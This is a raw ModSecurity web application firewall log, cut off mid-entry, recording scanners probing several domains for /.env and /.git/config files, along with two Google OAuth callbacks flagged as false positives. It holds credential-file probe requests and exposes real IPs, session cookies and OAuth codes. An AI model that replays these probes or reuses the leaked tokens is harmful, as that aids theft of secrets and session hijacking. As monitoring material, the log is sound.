p5=106, sr=141, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --198d3d7e-Z-- --c4cc6a3c-A-- [24/Jul/2025:07:04:27.242707 +0300] aIGwy1ooLYw4or2LgWJDlgAAAMQ 46.101.1.225 57170 127.0.0.1 7081 --c4cc6a3c-B-- GET /.env HTTP/1.0 Host: posrest.raqmix.cloud X-Real-IP: 46.101.1.225 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --c4cc6a3c-F-- HTTP/1.1 200 OK Upgrade: h2,h2c Connection: Upgrade, close X-Accel-Version: 0.01 Last-Modified: Mon, 23 Jun 2025 03:26:34 GMT ETag: "245-63834c76447d1" Accept-Ranges: bytes Content-Length: 581 --c4cc6a3c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "posrest.raqmix.cloud"] [uri "/.env"] [unique_id "aIGwy1ooLYw4or2LgWJDlgAAAMQ"] Stopwatch: 1753329867238168 4622 (- - -) Stopwatch2: 1753329867238168 4622; combined=2812, p1=664, p2=2016, p3=31, p4=36, p5=65, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c4cc6a3c-Z-- --a5f39c6b-A-- [24/Jul/2025:07:04:27.583847 +0300] aIGwy1ooLYw4or2LgWJDmAAAANA 46.101.1.225 57220 127.0.0.1 7081 --a5f39c6b-B-- GET /.git/config HTTP/1.0 Host: posrest.raqmix.cloud X-Real-IP: 46.101.1.225 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --a5f39c6b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 15:42:45 GMT ETag: "328-62a6a8c186eb7" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --a5f39c6b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "posrest.raqmix.cloud"] [uri "/.git/config"] [unique_id "aIGwy1ooLYw4or2LgWJDmAAAANA"] Stopwatch: 1753329867580276 3739 (- - -) Stopwatch2: 1753329867580276 3739; combined=2315, p1=491, p2=1738, p3=0, p4=0, p5=86, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a5f39c6b-Z-- --52f5831d-A-- [24/Jul/2025:07:11:26.393502 +0300] aIGybkdutIOpb_kg22jYNAAAAAc 185.177.72.24 47476 127.0.0.1 7081 --52f5831d-B-- GET /.git/config HTTP/1.0 Host: sys.ellaith.com X-Real-IP: 185.177.72.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Accept-Charset: utf-8 Accept-Encoding: gzip --52f5831d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=185d40783ab2fdaae3e58112d4c25011; expires=Thu, 24 Jul 2025 05:12:26 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --52f5831d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.ellaith.com"] [uri "/.git/config"] [unique_id "aIGybkdutIOpb_kg22jYNAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753330286326642 66977 (- - -) Stopwatch2: 1753330286326642 66977; combined=3007, p1=495, p2=2355, p3=0, p4=0, p5=156, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --52f5831d-Z-- --c6146d4b-A-- [24/Jul/2025:07:15:50.309360 +0300] aIGzdlooLYw4or2LgWJb6QAAANE 20.74.83.27 43716 127.0.0.1 7081 --c6146d4b-B-- GET /.env HTTP/1.0 Host: raqmix.cloud X-Real-IP: 20.74.83.27 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br --c6146d4b-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 29 Dec 2024 15:42:45 GMT ETag: "328-62a6a8c186eb7" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --c6146d4b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "raqmix.cloud"] [uri "/.env"] [unique_id "aIGzdlooLYw4or2LgWJb6QAAANE"] Stopwatch: 1753330550305266 4244 (- - -) Stopwatch2: 1753330550305266 4244; combined=2342, p1=539, p2=1736, p3=0, p4=0, p5=67, sr=161, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6146d4b-Z-- --3b059243-A-- [24/Jul/2025:07:22:14.405894 +0300] aIG09looLYw4or2LgWJpYgAAAMs 93.127.133.33 43078 127.0.0.1 7081 --3b059243-B-- GET /.env HTTP/1.0 Host: 41.128.143.88 X-Real-IP: 93.127.133.33 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: python-requests/2.32.4 Accept-Encoding: gzip, deflate Accept: */* --3b059243-F-- HTTP/1.1 421 Misdirected Request Content-Length: 386 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b059243-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.88"] [uri "/.env"] [unique_id "aIG09looLYw4or2LgWJpYgAAAMs"] Apache-Error: [file "ssl_engine_kernel.c"] [line 325] [level 3] AH02032: Hostname default-41_128_143_86 (default host as no SNI was provided) and hostname 41.128.143.88 provided via HTTP have no compatible SSL setup Stopwatch: 1753330934404846 1124 (- - -) Stopwatch2: 1753330934404846 1124; combined=649, p1=520, p2=0, p3=28, p4=31, p5=70, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b059243-Z-- --4c9ecd01-A-- [24/Jul/2025:07:28:43.767000 +0300] aIG2e1ooLYw4or2LgWJ2ewAAAMs 213.209.143.116 40450 127.0.0.1 7081 --4c9ecd01-B-- GET /.env HTTP/1.0 Host: test.kime.agency X-Real-IP: 213.209.143.116 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 accept-encoding: gzip --4c9ecd01-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --4c9ecd01-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.env"] [unique_id "aIG2e1ooLYw4or2LgWJ2ewAAAMs"] Stopwatch: 1753331323762926 4158 (- - -) Stopwatch2: 1753331323762926 4158; combined=2420, p1=611, p2=1738, p3=0, p4=0, p5=71, sr=207, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4c9ecd01-Z-- --9d3d7c47-A-- [24/Jul/2025:07:37:03.972902 +0300] aIG4b1ooLYw4or2LgWKInwAAAM8 185.177.72.27 55256 127.0.0.1 7081 --9d3d7c47-B-- GET /.git/config HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.27 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: python-httpx/0.28.1 --9d3d7c47-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --9d3d7c47-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.git/config"] [unique_id "aIG4b1ooLYw4or2LgWKInwAAAM8"] Stopwatch: 1753331823961019 11972 (- - -) Stopwatch2: 1753331823961019 11972; combined=6962, p1=3889, p2=2999, p3=0, p4=0, p5=74, sr=410, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d3d7c47-Z-- --de53645f-A-- [24/Jul/2025:07:37:04.149450 +0300] aIG4cFooLYw4or2LgWKIoQAAANA 185.177.72.27 55294 127.0.0.1 7081 --de53645f-B-- GET /.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.27 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: python-httpx/0.28.1 --de53645f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --de53645f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.env"] [unique_id "aIG4cFooLYw4or2LgWKIoQAAANA"] Stopwatch: 1753331824145432 4109 (- - -) Stopwatch2: 1753331824145432 4109; combined=2348, p1=519, p2=1759, p3=0, p4=0, p5=70, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --de53645f-Z-- --3358ce16-A-- [24/Jul/2025:07:37:04.212606 +0300] aIG4cFooLYw4or2LgWKIogAAANM 185.177.72.27 55310 127.0.0.1 7081 --3358ce16-B-- GET /api/.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.27 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: python-httpx/0.28.1 --3358ce16-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --3358ce16-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/api/.env"] [unique_id "aIG4cFooLYw4or2LgWKIogAAANM"] Stopwatch: 1753331824208785 3904 (- - -) Stopwatch2: 1753331824208785 3904; combined=2315, p1=521, p2=1722, p3=0, p4=0, p5=72, sr=166, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3358ce16-Z-- --341c0469-A-- [24/Jul/2025:07:37:04.281009 +0300] aIG4cFooLYw4or2LgWKIowAAAMQ 185.177.72.27 55316 127.0.0.1 7081 --341c0469-B-- GET /config/.env HTTP/1.0 Host: itilebanon.com X-Real-IP: 185.177.72.27 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: python-httpx/0.28.1 --341c0469-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --341c0469-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/config/.env"] [unique_id "aIG4cFooLYw4or2LgWKIowAAAMQ"] Stopwatch: 1753331824271054 10091 (- - -) Stopwatch2: 1753331824271054 10091; combined=7465, p1=613, p2=6772, p3=0, p4=0, p5=80, sr=177, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --341c0469-Z-- --27f7752d-A-- [24/Jul/2025:07:38:48.603784 +0300] aIG42EdutIOpb_kg22j04gAAAAg 141.105.87.197 47682 127.0.0.1 7081 --27f7752d-B-- GET /administration/index.php?code=4/0AVMBsJgEXt27E3j0jMVrscKc82Tk4p6jSG2ssu9WyvhvCZUwXGZA5DvjdcpSWHNeYcmIuA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 141.105.87.197 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=61qb8su8lj1q0b096jrjrh0ps0 --27f7752d-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --27f7752d-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIG42EdutIOpb_kg22j04gAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753331928180995 422934 (- - -) Stopwatch2: 1753331928180995 422934; combined=10707, p1=771, p2=9590, p3=152, p4=71, p5=123, sr=183, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27f7752d-Z-- --0cf2aa72-A-- [24/Jul/2025:07:57:43.390450 +0300] aIG9R1ooLYw4or2LgWKucwAAAMM 185.177.72.24 35582 127.0.0.1 7081 --0cf2aa72-B-- GET /.git/config HTTP/1.0 Host: test.kime.agency X-Real-IP: 185.177.72.24 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Accept-Charset: utf-8 Accept-Encoding: gzip --0cf2aa72-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 25 Jan 2023 19:33:35 GMT ETag: "328-5f31bb5588323" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --0cf2aa72-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "test.kime.agency"] [uri "/.git/config"] [unique_id "aIG9R1ooLYw4or2LgWKucwAAAMM"] Stopwatch: 1753333063385643 4906 (- - -) Stopwatch2: 1753333063385643 4906; combined=2782, p1=752, p2=1953, p3=0, p4=0, p5=77, sr=277, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0cf2aa72-Z-- --994c1b58-A-- [24/Jul/2025:08:00:58.627054 +0300] aIG-CkdutIOpb_kg22gIPAAAAAE 167.99.210.137 43220 127.0.0.1 7081 --994c1b58-B-- GET /.env HTTP/1.0 Host: museduliban.com X-Real-IP: 167.99.210.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --994c1b58-F-- HTTP/1.1 503 Service Unavailable Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 18 Mar 2025 01:24:13 GMT ETag: "396-63093c3371a9c" Accept-Ranges: bytes Content-Length: 918 Content-Type: text/html --994c1b58-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "museduliban.com"] [uri "/.env"] [unique_id "aIG-CkdutIOpb_kg22gIPAAAAAE"] Stopwatch: 1753333258625952 1183 (- - -) Stopwatch2: 1753333258625952 1183; combined=558, p1=487, p2=0, p3=0, p4=0, p5=71, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --994c1b58-Z-- --c3afb138-A-- [24/Jul/2025:08:00:58.815260 +0300] aIG-ClooLYw4or2LgWKzqAAAAMg 167.99.210.137 43248 127.0.0.1 7081 --c3afb138-B-- GET /.git/config HTTP/1.0 Host: museduliban.com X-Real-IP: 167.99.210.137 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --c3afb138-F-- HTTP/1.1 503 Service Unavailable Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 18 Mar 2025 01:24:13 GMT ETag: "396-63093c3371a9c" Accept-Ranges: bytes Content-Length: 918 Content-Type: text/html --c3afb138-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "museduliban.com"] [uri "/.git/config"] [unique_id "aIG-ClooLYw4or2LgWKzqAAAAMg"] Stopwatch: 1753333258813865 1505 (- - -) Stopwatch2: 1753333258813865 1505; combined=774, p1=679, p2=0, p3=0, p4=0, p5=94, sr=163, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3afb138-Z-- --5268ed29-A-- [24/Jul/2025:08:01:21.481744 +0300] aIG-IVooLYw4or2LgWK0YAAAANc 212.28.242.186 49376 127.0.0.1 7081 --5268ed29-B-- GET /administration/index.php?code=4/0AVMBsJghn41zE9LSiopEnnk7LpBT2flmXqlIqJzeKmTX3nEFUbnmfxDn-SygBFGqDiH7hw&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.186 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=mdo3pesladhiq4t2v5c3doj7i0 --5268ed29-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --5268ed29-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname 